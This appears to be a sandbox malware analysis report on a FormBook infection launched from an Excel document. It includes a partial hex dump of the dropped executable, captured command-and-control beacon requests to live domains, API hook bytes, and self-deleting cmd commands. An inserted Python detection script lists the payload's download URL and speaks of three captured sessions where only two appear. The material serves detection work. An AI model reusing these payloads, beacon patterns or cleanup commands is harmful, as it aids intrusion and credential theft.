03 00 00 00 10 00 00 06 f0 71 00 00 98 2b 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 62 00 64 00 63 00 65 00 66 00 67 00 68 00 69 00 6a 00 6b 00 6c 
00 6d 00 6e 00 70 00 72 00 71 00 73 00 74 00 75 00 76 00 77 00 7a 00 79 00 78 00 30 00 31 00 32 00 33 00 34 00 35 00 36 00 37 00 38 00 39 00 41 00 42 00 43 00 44 00 45 00 46 00 47 00 48 00 49 00 4a 00 4b 00 4c 00 4d 00 4e 00 51 00 50 00 52 00 54 00 53 00 56 00 55 00 57 00 58 00 59 00 5a 00 36 02 03 28 03 00 00 06 6f 01 00 00 0a 2a 42 03 02 03 28 01 00 00 06 14 6f 02 00 00 0a 26 2a 32 02 28 05 00 00 06 74 06 00 00 01 2a 1e 28 06 00 00 06 26 2a 32 02 74 07 00 00 01 6f 03 00 00 0a 2a 46 7e 02 00 00 04 7e 03 00 00 04 28 02 00 00 06 17 2a 0a 16 2a 1e 02 28 07 00 00 0a 2a ba 28 08 00 00 0a 80 01 00 00 04 28 0d 00 00 06 28 09 00 00 0a 80 02 00 00 04 28 0d 00 00 06 28 09 00 00 0a 6f 0a 00 00 0a 80 03 00 00 04 2a 26 02 03 04 6f 0b 00 00 0a 2a 1a 28 04 00 00 06 2a 1a 28 0e 00 00 06 2a 2e 72 3f 00 00 70 80 04 00 00 04 2a 36 03 02 7b 62 00 00 0a 28 5e 00 00 0a 2a 8a 03 6f 03 00 00 0a 02 7b 61 00 00 0a 7b 63 00 00 0a 02 7b 62 00 00 0a 6f 5a 00 00 0a 28 5e 00 00 0a 2a 2e 73 6f 00 00 0a 80 70 00 00 0a 2a 1e 03 6f 71 00 00 0a 2a 56 02 7b 11 00 00 04 6f 64 00 00 0a 03 28 12 00 00 2b 16 fe 01 2a 4a 02 7b 12 00 00 04 6f 31 00 00 0a 03 6f 76 00 00 0a 2a 4a 03 02 7b 13 00 00 04 6f
                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_= @@ U@=O@B` H.text `.rsrcB@ @@.reloc`$@B=Hq+abdcefghijklmnprqstuvwzyx0123456789ABCDEFGHIJKLMNQPRTSVUWXYZ6(o*B(o&*2(t*(&*2to*F~~(**(*(((((o*&o*(*(*.r?p*6{b(^*o{a{c{boZ(^*.sop*oq*V{od(+*J{o1ov*J{o


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49166 | 91.195.241.137 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:24:55.913090944 CET | 636 | OUT | GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd+jiD/A7jyp+1eDPaflq2WzCVhzhMiI/AcsKs8L0UbA7cJFll24IqQXw==&_L30=xTm4lrNPut HTTP/1.1
Host: www.pestigenix.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:24:55.956897974 CET | 637 | IN | HTTP/1.1 302 Found
date: Fri, 20 Nov 2020 10:24:55 GMT
content-type: text/html; charset=UTF-8
content-length: 0
x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_NAnNDwyJzoYm1RRySDngvvHUFtvgQ2obU/nMiHo+KjE4OG0hZk4DAqRZfsqVz6DfJjgTkeN2ab0W7fbLhn4rdw==
expires: Mon, 26 Jul 1997 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
pragma: no-cache
last-modified: Fri, 20 Nov 2020 10:24:55 GMT
location: https://sedo.com/search/details/?partnerid=324561&language=it&domain=pestigenix.com&origin=sales_lander_1&utm_medium=Parking&utm_campaign=offerpage
x-cache-miss-from: parking-787d9d44d9-l79rg
server: NginX
connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49167 | 180.215.92.80 | 80 | C:\Windows\explorer.exe

Timestamp | kBytes transferred | Direction | Data
Nov 20, 2020 11:25:16.686966896 CET | 638 | OUT | GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb/7ChAIv3inAbNRhZBDtLZ1SN+NiEwBpgcLnXYR/VVRXtAcpgPjhXSMA==&_L30=xTm4lrNPut HTTP/1.1
Host: www.atlanticdentallab.com
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Nov 20, 2020 11:25:17.932526112 CET | 638 | IN | HTTP/1.1 302 Found
Transfer-Encoding: chunked
Location: /waf_verify.htm
Server: Nginx Microsoft-HTTPAPI/2.0
X-Powered-By: Nginx
Date: Fri, 20 Nov 2020 10:24:14 GMT
Connection: close
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
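The three sessions above show two different behaviours worth detecting on their own: the Equation Editor (EQNEDT32.EXE) fetching a file that starts with the MZ magic and is served as application/x-msdownload from a dynamic-DNS host, and explorer.exe issuing GET requests of identical shape (same /kgw/ path, same UL0tlN9h and _L30 parameter names, a seven-NUL-byte body, Connection: close) to two unrelated domains that both answered with a 302. The Python below is an added example, not code from this report or from Joe Sandbox: it runs the checks a detection engineer would write over those sessions. The session records are constructed from the captures above with query values and bodies truncated; the rule labels are my own and are not the sandbox's signature names.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, urlsplit


@dataclass
class HttpSession:
    session_id: int
    process: str                    # image path as the sandbox reports it
    dst_ip: str
    dst_port: int
    request_line: str               # e.g. "GET /x HTTP/1.1"
    request_headers: Dict[str, str]
    request_body: bytes
    response_status: int
    response_headers: Dict[str, str]
    response_body: bytes            # leading bytes are enough for the checks below


# Constructed from the three sessions captured above (values truncated,
# header names kept as each peer sent them).
SESSIONS = [
    HttpSession(0, r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
                "103.125.191.5", 80, "GET /worksdoc/svchost.exe HTTP/1.1",
                {"Host": "workfinethdysanotherrainbowlomoyentthghf.ydns.eu", "Connection": "Keep-Alive"},
                b"", 200,
                {"Content-Type": "application/x-msdownload", "Content-Length": "599552"},
                b"MZ\x90\x00\x03\x00\x00\x00"),
    HttpSession(1, r"C:\Windows\explorer.exe", "91.195.241.137", 80,
                "GET /kgw/?UL0tlN9h=3DxvAc+RnyJZYPd&_L30=xTm4lrNPut HTTP/1.1",
                {"Host": "www.pestigenix.com", "Connection": "close"},
                b"\x00" * 7, 302,
                {"content-type": "text/html; charset=UTF-8", "content-length": "0"}, b""),
    HttpSession(2, r"C:\Windows\explorer.exe", "180.215.92.80", 80,
                "GET /kgw/?UL0tlN9h=3e4oHR0srMrz4pb&_L30=xTm4lrNPut HTTP/1.1",
                {"Host": "www.atlanticdentallab.com", "Connection": "close"},
                b"\x00" * 7, 302,
                {"Transfer-Encoding": "chunked", "Location": "/waf_verify.htm"}, b"0\r\n\r\n"),
]

OFFICE_HELPERS = {"eqnedt32.exe"}      # the equation editor is never a legitimate HTTP client
SHELL_PROCESSES = {"explorer.exe"}     # the shell speaking HTTP usually means injected code
PE_CONTENT_TYPES = {"application/x-msdownload", "application/octet-stream"}


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def header(headers: Dict[str, str], name: str) -> str:
    """Case-insensitive lookup: session 1 answered with lowercase header names."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return ""


def per_session_findings(s: HttpSession) -> List[str]:
    hits = []
    name = image_name(s.process)
    if name in OFFICE_HELPERS:
        hits.append("office_helper_http_client")
    if name in SHELL_PROCESSES:
        hits.append("shell_process_http_client")
    content_type = header(s.response_headers, "Content-Type").split(";")[0].strip().lower()
    if s.response_body.startswith(b"MZ") or content_type in PE_CONTENT_TYPES:
        hits.append("pe_download")            # a PE came down the wire
    if s.request_line.startswith("GET ") and s.request_body and set(s.request_body) == {0}:
        hits.append("get_with_null_body")     # no browser or updater sends this
    return hits


def request_shape(s: HttpSession) -> Tuple[str, str, Tuple[str, ...]]:
    """(image, URI path, sorted query parameter names): what stays constant in a
    polling request while the Host and the parameter values rotate."""
    _, _, rest = s.request_line.partition(" ")
    target = rest.rsplit(" ", 1)[0]           # strip the HTTP version
    parts = urlsplit(target)
    names = tuple(sorted(parse_qs(parts.query, keep_blank_values=True)))
    return image_name(s.process), parts.path, names


def beacon_clusters(sessions: List[HttpSession]):
    """Requests of identical shape from one process to two or more distinct Hosts."""
    groups: Dict[Tuple[str, str, Tuple[str, ...]], List[str]] = defaultdict(list)
    for s in sessions:
        if s.request_line.startswith("GET "):
            groups[request_shape(s)].append(header(s.request_headers, "Host"))
    return [(shape, hosts) for shape, hosts in groups.items() if len(set(hosts)) >= 2]


def report(sessions: List[HttpSession]) -> Dict[int, List[str]]:
    """Per-session findings, plus a cluster tag on every member of a multi-host cluster."""
    out = {s.session_id: per_session_findings(s) for s in sessions}
    clustered = {shape for shape, _ in beacon_clusters(sessions)}
    for s in sessions:
        if request_shape(s) in clustered:
            out[s.session_id].append("c2_polling_cluster")
    return out


if __name__ == "__main__":
    for sid, hits in report(SESSIONS).items():
        print(sid, hits)
```

The cluster rule deliberately ignores the parameter values and the Host, because those are what rotate between beacons; what a single injected process keeps constant is the path and the parameter names, and two unrelated domains receiving that exact shape within a minute is the signal. On live data the same grouping would be done per process over a sliding time window rather than over a whole capture.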


                                                                                                                                                Code Manipulations

                                                                                                                                                User Modules

                                                                                                                                                Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

                                                                                                                                                Processes

                                                                                                                                                Process: explorer.exe, Module: USER32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xE1
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xE1

                                                                                                                                                Statistics

                                                                                                                                                Behavior


                                                                                                                                                System Behavior

                                                                                                                                                General

                                                                                                                                                Start time:11:22:56
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                Imagebase:0x13f650000
                                                                                                                                                File size:27641504 bytes
                                                                                                                                                MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:23:16
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                Imagebase:0x400000
                                                                                                                                                File size:543304 bytes
                                                                                                                                                MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                Reputation:high

                                                                                                                                                General

                                                                                                                                                Start time:11:23:19
                                                                                                                                                Start date:20/11/2020
                                                                                                                                                Path:C:\Users\Public\vbc.exe
                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                Imagebase:0xfe0000
                                                                                                                                                File size:599552 bytes
                                                                                                                                                MD5 hash:429BBA6DBE159C300679509BE3085665
                                                                                                                                                Has elevated privileges:true
                                                                                                                                                Has administrator privileges:true
                                                                                                                                                Programmed in:.Net C# or VB.NET
                                                                                                                                                Yara matches:
                                                                                                                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2192654886.00000000040A9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000003.2185713552.0000000005083000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2194941292.00000000050B3000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2190181482.0000000000510000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:
• Detection: 100%, Avira
• Detection: 100%, Joe Sandbox ML
• Detection: 33%, ReversingLabs
Reputation: low

General

Start time: 11:23:24
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase: 0xaf0000
File size: 64672 bytes
MD5 hash: ADF76F395D5A0ECBBF005390B73C3FD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 11:23:24
Start date: 20/11/2020
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Imagebase: 0xaf0000
File size: 64672 bytes
MD5 hash: ADF76F395D5A0ECBBF005390B73C3FD2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2219572651.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2216844899.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000006.00000002.2217232228.0000000000880000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:23:26
Start date: 20/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: 'C:\Windows\System32\cmd.exe' /C choice /C Y /N /D Y /T 3 & Del 'C:\Users\Public\vbc.exe'
Imagebase: 0x4a2b0000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 11:23:27
Start date: 20/11/2020
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0xffca0000
File size: 3229696 bytes
MD5 hash: 38AE1B3C38FAEF56FE4907922F0385BA
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 11:23:27
Start date: 20/11/2020
Path: C:\Windows\SysWOW64\choice.exe
Wow64 process (32bit): true
Commandline: choice /C Y /N /D Y /T 3
Imagebase: 0x970000
File size: 29696 bytes
MD5 hash: 11DDFBF834BB2C6F4D23297D80EE9E45
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate

General

Start time: 11:23:37
Start date: 20/11/2020
Path: C:\Windows\SysWOW64\NETSTAT.EXE
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\NETSTAT.EXE
Imagebase: 0xff0000
File size: 27136 bytes
MD5 hash: 32297BB17E6EC700D0FC869F9ACAF561
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385404408.0000000000510000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385365843.00000000003D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000B.00000002.2385186068.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 11:23:43
Start date: 20/11/2020
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe'
Imagebase: 0x4ab10000
File size: 302592 bytes
MD5 hash: AD7B9C14083B52BC532FBA5948342B98
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Disassembly

Code Analysis
